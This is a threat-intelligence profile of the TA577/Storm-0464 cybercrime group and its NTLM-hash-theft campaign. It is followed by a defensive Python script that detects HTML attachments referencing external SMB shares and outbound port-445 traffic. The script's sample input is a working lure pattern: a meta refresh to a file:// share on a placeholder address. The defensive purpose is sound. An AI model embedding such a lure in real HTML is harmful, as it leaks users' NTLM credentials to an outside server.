TA577 (Proofpoint) / Storm-0464 (Microsoft) is a prominent cybercrime (affiliate) threat actor.
Role in the RaaS economy: initial access provider
Targets: Americas and Europe
Loaders used for initial access:
- Qakbot: One of the primary payloads used by the group; Qakbot infections are used to deploy ransomware.
- SquirrelWaffle Loader: Another payload distributed by the group, also used by attackers to deploy ransomware.
- Pikabot: In February 2023, they started distributing Pikabot.
- DarkGate: After the takedown of Qakbot, in September 2023 they started using DarkGate in their initial access campaigns.
- IcedID: Along with DarkGate, they also started using IcedID in their initial access campaigns in September 2023.
- Additionally, the group has deployed payloads such as SystemBC, SmokeLoader, Ursnif, and Cobalt Strike.
Ransomware Deployment/Infections by the group
- Storm-0506, which deploys Black Basta (Storm-0506 previously deployed Conti).
- Sodinokibi
Recent Activity
- In February 2023, group started distributing Pikabot.
- In September 2023, they began leveraging DarkGate and IcedID in their initial access campaigns.
- On January 25, 2024, they started distributing a new version of Qakbot through a phishing email campaign.
- On September 28, 2023, they shifted to distributing DarkGate malware after the takedown of Qakbot’s infrastructure.
- In 2020, they leveraged Qakbot infections leading to ransomware deployment by various groups.
Latest activity
Attack Chain and Objective as observed in recent activity by Proofpoint:
- Proofpoint identified TA577 using a new attack chain to achieve an uncommonly observed objective: stealing NT LAN Manager (NTLM) authentication information.
- This activity allows the threat actor to gather sensitive information and potentially enable follow-on attacks.
- At least two campaigns leveraging this technique were observed, targeting hundreds of organizations globally.
- The attack involved sending messages as replies to previous emails (known as thread hijacking) and containing zipped HTML attachments.
- When recipients opened these attachments, the system attempted a connection to an external Server Message Block (SMB) server owned by the threat actor.
- The goal was to capture NTLMv2 challenge/response pairs at that SMB server, i.e., to steal NTLM hashes.
- These stolen hashes could be exploited for password cracking or used in “Pass-the-Hash” attacks within the targeted organization.
- Use of the open-source toolkit Impacket on the SMB server was identified, indicating the threat actor’s intent.
- Disabling guest access to SMB does not mitigate the attack, because the file must first authenticate to the external SMB server before it can determine whether guest access should be used.
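Two defender-side checks that follow from the chain described above, written here as an added example (not Proofpoint's code, and not from the original profile): a triage routine that flags HTML attachments referencing an external SMB share over file:// or UNC paths, and a log filter that flags outbound TCP/445 flows to non-internal addresses. The HTML sample, the firewall log line format and the 203.0.113.5 address (TEST-NET-3) are all constructed placeholders.

```python
"""Defender-side triage for the NTLM-capture chain: flag HTML attachments that
would make Windows reach out to an external SMB share, and flag outbound SMB
(TCP/445) flows to non-internal hosts in firewall logs.
Added example; sample inputs are constructed, not taken from the profile."""
import ipaddress
import re

# RFC 1918, loopback and link-local ranges are treated as internal; anything
# else is "external" for triage purposes. (TEST-NET ranges are deliberately
# NOT listed here so the constructed placeholder IP is treated as external.)
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Matches the host part of a file:// URL or a UNC path (\\host\share).
_SMB_REF = re.compile(r'(?:file:/{2,5}|\\\\)([A-Za-z0-9.\-]+)', re.IGNORECASE)

# Assumed firewall line format: "<ts> <action> <proto> <src>:<sport> -> <dst>:<dport>"
_FW_LINE = re.compile(r'^(\S+) (\w+) (\w+) (\S+):(\d+) -> (\S+):(\d+)$')


def _is_external(host: str) -> bool:
    """True if host is an IP outside the internal ranges, or a non-local FQDN."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Hostname: single-label or .local names are assumed internal.
        return "." in host and not host.lower().endswith(".local")
    return not any(ip in net for net in _INTERNAL_NETS)


def find_external_smb_refs(html: str) -> list[str]:
    """Return external hosts an HTML attachment would contact over SMB."""
    hosts = {m.group(1) for m in _SMB_REF.finditer(html)}
    return sorted(h for h in hosts if _is_external(h))


def find_outbound_smb(lines) -> list[dict]:
    """Return outbound TCP/445 flows whose destination is not internal."""
    hits = []
    for line in lines:
        m = _FW_LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the assumed format
        ts, action, proto, src, _sport, dst, dport = m.groups()
        if proto.upper() == "TCP" and dport == "445" and _is_external(dst):
            hits.append({"ts": ts, "action": action, "src": src, "dst": dst})
    return hits


# Constructed sample attachment: a meta refresh to a file:// URL on a
# placeholder address (203.0.113.5, TEST-NET-3).
SAMPLE_HTML = ('<html><head><meta http-equiv="refresh" '
               'content="0; url=file://203.0.113.5/share/"></head></html>')

# Constructed firewall log lines: one internal SMB flow, one external SMB
# flow (the one we want to see), one unrelated HTTPS flow.
SAMPLE_FW = [
    "2024-03-01T10:00:01Z ALLOW TCP 10.0.0.12:51022 -> 10.0.0.5:445",
    "2024-03-01T10:00:03Z ALLOW TCP 10.0.0.12:51023 -> 203.0.113.5:445",
    "2024-03-01T10:00:04Z ALLOW TCP 10.0.0.12:51024 -> 198.51.100.7:443",
]

if __name__ == "__main__":
    print("external SMB refs in attachment:", find_external_smb_refs(SAMPLE_HTML))
    print("outbound SMB to external hosts:", find_outbound_smb(SAMPLE_FW))
```

The second check is the one that matters once an attachment has already been opened: an ALLOW on outbound 445 to a non-internal address is the event that should never appear, so a perimeter rule blocking outbound SMB, together with the Windows "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy, closes the gap that disabling SMB guest access (as noted above) does not.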